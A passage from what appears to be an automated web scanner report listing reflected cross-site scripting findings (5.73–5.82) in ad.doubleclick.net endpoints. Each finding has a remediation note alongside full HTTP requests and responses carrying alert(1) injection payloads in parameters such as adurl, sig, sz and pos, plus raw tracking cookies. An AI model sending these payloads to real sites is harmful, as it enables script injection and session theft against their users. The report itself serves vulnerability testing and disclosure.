Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 296
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 14:58:24 GMT
Expires: Wed, 11 May 2011 14:58:24 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/r;44306;0-0;0;63470723;255-0/0;0/0/0;;~okv=;net=37a35';alert(1)//afc6867632e;~aopt=2/1/e4/0;~sscs=%3f"><img s
...[SNIP]...

5.73. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/rmm.starpulse2/safescholarsus11_us_300x250vid

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ed33'-alert(1)-'e1ce3a9f88a was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/rmm.starpulse2/safescholarsus11_us_300x250vid;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=Bb-5PQ6XKTdr0IMz0lAeho6GsBcq7ye8BAAAAEAEgn4j1ATgAWMLG6pIUYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQozMDB4MjUwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE&num=0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ&client=ca-pub-9674942009345807&adurl=2ed33'-alert(1)-'e1ce3a9f88a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1350
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:50:35 GMT
Expires: Wed, 11 May 2011 15:50:35 GMT

document.write('<!-- Template ID = 12740 Template Name = !!! Image Banner - Open in New Window - RMM -->\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/7/1a5/%2a/k%3B238839690%3B0-0%3B0%3B
...[SNIP]...
2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE&num=0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ&client=ca-pub-9674942009345807&adurl=2ed33'-alert(1)-'e1ce3a9f88ahttp://www.safetyscholars.com\" target=\"_blank\">
...[SNIP]...

5.74. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/rmm.starpulse2/safescholarsus11_us_300x250vid

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e4ad'-alert(1)-'3c06c5c5c48 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/rmm.starpulse2/safescholarsus11_us_300x250vid;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=Bb-5PQ6XKTdr0IMz0lAeho6GsBcq7ye8BAAAAEAEgn4j1ATgAWMLG6pIUYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQozMDB4MjUwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE5e4ad'-alert(1)-'3c06c5c5c48&num=0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ&client=ca-pub-9674942009345807&adurl=;ord=1932777788? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:48:04 GMT
Content-Length: 1356

document.write('<!-- Template ID = 12740 Template Name = !!! Image Banner - Open in New Window - RMM -->\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/1a5/%2a/k%3B238839690%3B0-0%3B0%3B
...[SNIP]...
mIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQozMDB4MjUwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE5e4ad'-alert(1)-'3c06c5c5c48&num=0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ&client=ca-pub-9674942009345807&adurl=http%3a%2f%2fwww.safetyscholars.com\" target=\"_blank\">
...[SNIP]...

5.75. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/rmm.starpulse2/safescholarsus11_us_300x250vid

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35498'-alert(1)-'1b1d99193ad was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/rmm.starpulse2/safescholarsus11_us_300x250vid;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=Bb-5PQ6XKTdr0IMz0lAeho6GsBcq7ye8BAAAAEAEgn4j1ATgAWMLG6pIUYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQozMDB4MjUwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE&num=0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ&client=ca-pub-967494200934580735498'-alert(1)-'1b1d99193ad&adurl=;ord=1932777788? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:49:57 GMT
Content-Length: 1356

document.write('<!-- Template ID = 12740 Template Name = !!! Image Banner - Open in New Window - RMM -->\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/1a5/%2a/k%3B238839690%3B0-0%3B0%3B
...[SNIP]...
FycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE&num=0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ&client=ca-pub-967494200934580735498'-alert(1)-'1b1d99193ad&adurl=http%3a%2f%2fwww.safetyscholars.com\" target=\"_blank\">
...[SNIP]...

5.76. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/rmm.starpulse2/safescholarsus11_us_300x250vid

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20a31'-alert(1)-'897ff323ff0 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/rmm.starpulse2/safescholarsus11_us_300x250vid;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=Bb-5PQ6XKTdr0IMz0lAeho6GsBcq7ye8BAAAAEAEgn4j1ATgAWMLG6pIUYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQozMDB4MjUwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE&num=020a31'-alert(1)-'897ff323ff0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ&client=ca-pub-9674942009345807&adurl=;ord=1932777788? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:48:41 GMT
Content-Length: 1356

document.write('<!-- Template ID = 12740 Template Name = !!! Image Banner - Open in New Window - RMM -->\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/1a5/%2a/k%3B238839690%3B0-0%3B0%3B
...[SNIP]...
sgERd3d3LnN0YXJwdWxzZS5jb226AQozMDB4MjUwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE&num=020a31'-alert(1)-'897ff323ff0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ&client=ca-pub-9674942009345807&adurl=http%3a%2f%2fwww.safetyscholars.com\" target=\"_blank\">
...[SNIP]...

5.77. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/rmm.starpulse2/safescholarsus11_us_300x250vid

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24bdb'-alert(1)-'1151e4da4b2 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/rmm.starpulse2/safescholarsus11_us_300x250vid;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=Bb-5PQ6XKTdr0IMz0lAeho6GsBcq7ye8BAAAAEAEgn4j1ATgAWMLG6pIUYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQozMDB4MjUwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE&num=0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ24bdb'-alert(1)-'1151e4da4b2&client=ca-pub-9674942009345807&adurl=;ord=1932777788? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:49:20 GMT
Content-Length: 1356

document.write('<!-- Template ID = 12740 Template Name = !!! Image Banner - Open in New Window - RMM -->\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/1a5/%2a/k%3B238839690%3B0-0%3B0%3B
...[SNIP]...
wX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE&num=0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ24bdb'-alert(1)-'1151e4da4b2&client=ca-pub-9674942009345807&adurl=http%3a%2f%2fwww.safetyscholars.com\" target=\"_blank\">
...[SNIP]...

5.78. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/rmm.starpulse2/safescholarsus11_us_300x250vid

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98589'-alert(1)-'9f621ba6440 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/rmm.starpulse2/safescholarsus11_us_300x250vid;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L98589'-alert(1)-'9f621ba6440&ai=Bb-5PQ6XKTdr0IMz0lAeho6GsBcq7ye8BAAAAEAEgn4j1ATgAWMLG6pIUYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQozMDB4MjUwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2Mjcv4AEGmALEE8ACAuACAOoCDENvbnRlc3RzLTMwMPgC8NEekAOkA5gD4AOoAwHgBAE&num=0&sig=AGiWqtxP4btLzhXCLEG8ovXIlLCiYGmDaQ&client=ca-pub-9674942009345807&adurl=;ord=1932777788? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:47:39 GMT
Content-Length: 1356

document.write('<!-- Template ID = 12740 Template Name = !!! Image Banner - Open in New Window - RMM -->\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/1a5/%2a/k%3B238839690%3B0-0%3B0%3B62167087%3B4307-300/250%3B41274702/41292489/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L98589'-alert(1)-'9f621ba6440&ai=Bb-5PQ6XKTdr0IMz0lAeho6GsBcq7ye8BAAAAEAEgn4j1ATgAWMLG6pIUYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQozMDB4MjUwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2
...[SNIP]...

5.79. http://ad.doubleclick.net/adj/sugarhouseads/house [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/sugarhouseads/house

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97926'-alert(1)-'8c7a06cf11f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/sugarhouseads/house;sz=300x250;pos=above;ord=5465695955790579?&97926'-alert(1)-'8c7a06cf11f=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://showadsak.pubmatic.com/AdServer/AdServerServlet?01AD=37G1VCuXv0TgpuQmot_U9evlQ-ZwaOOPD56uOCkcTeBe18znStqcWJQ&01RI=20DAA44098E4E6B&01NA=&operId=1&pubId=16437&siteId=16486&adId=11723&kadwidth=300&kadheight=250&kbgColor=FFFFFF&ktextColor=000000&klinkColor=0000EE&frameName=http_ad_doubleclick_netadisugar_tresgallery;nid=16415520;sz=300x250;gid=3019466;pos=above;tile=3;ord=49966komli_ads_frame11643716486&kltstamp=2011-4-11%209%3A56%3A15&pageURL=http://ad.doubleclick.net/adi/sugar.tres/gallery;nid=16415520;sz=300x250;gid=3019466;pos=above;tile=3;ord=49966&ranreq=0.6309704261366278&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:01:38 GMT
Content-Length: 522

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/d;231005495;1-0;1;30930003;4307-300/250;42069329/42087116/1;;~okv=;sz=300x250;pos=above;;97926'-alert(1)-'8c7a06cf11f=1;~aopt=2/1/7e/0;~sscs=%3fhttp://www.popsugar.com/15919895?utm_source=sugarnetwork&utm_medium=banner&utm_term=Pop100game&utm_content=300x250&utm_campaign=sugarnetwork_banner_Pop100game_300x250">
...[SNIP]...

5.80. http://ad.doubleclick.net/adj/trb.zap2it/ntl/community [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/community

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7f59'%3balert(1)//fc3d7d07297 was submitted in the pos parameter. This input was echoed as a7f59';alert(1)//fc3d7d07297 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.zap2it/ntl/community;pos=a7f59'%3balert(1)//fc3d7d07297 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blog.zap2it.com/pop2it/2011/05/cannes-film-festival-uma-thurman-jude-law-salma-hayek-and-more-kick-things-off.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 306
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 14:56:08 GMT
Expires: Wed, 11 May 2011 14:56:08 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/e;44306;0-0;0;15034062;11962-2000/2000;0/0/0;;~okv=;pos=a7f59';alert(1)//fc3d7d07297;~aopt=2/1/880a/1;~sscs=%3f">
...[SNIP]...

5.81. http://ad.doubleclick.net/adj/trb.zap2it/ntl/community [rs parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/community

Issue detail

The value of the rs request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c1a8'%3balert(1)//042cd825ff8 was submitted in the rs parameter. This input was echoed as 4c1a8';alert(1)//042cd825ff8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.zap2it/ntl/community;rs=4c1a8'%3balert(1)//042cd825ff8 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/pop2it/video/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 305
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:52:04 GMT
Expires: Wed, 11 May 2011 15:52:04 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/e;44306;0-0;0;15034062;11962-2000/2000;0/0/0;;~okv=;rs=4c1a8';alert(1)//042cd825ff8;~aopt=2/1/880a/1;~sscs=%3f">
...[SNIP]...

5.82. http://ad.doubleclick.net/adj/trb.zap2it/ntl/hp [;ptype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/hp

Issue detail

The value of the ;ptype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fa86'%3balert(1)//c80a0abda8b was submitted in the ;ptype parameter. This input was echoed as 2fa86';alert(1)//c80a0abda8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.zap2it/ntl/hp;;ptype=2fa86'%3balert(1)//c80a0abda8b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
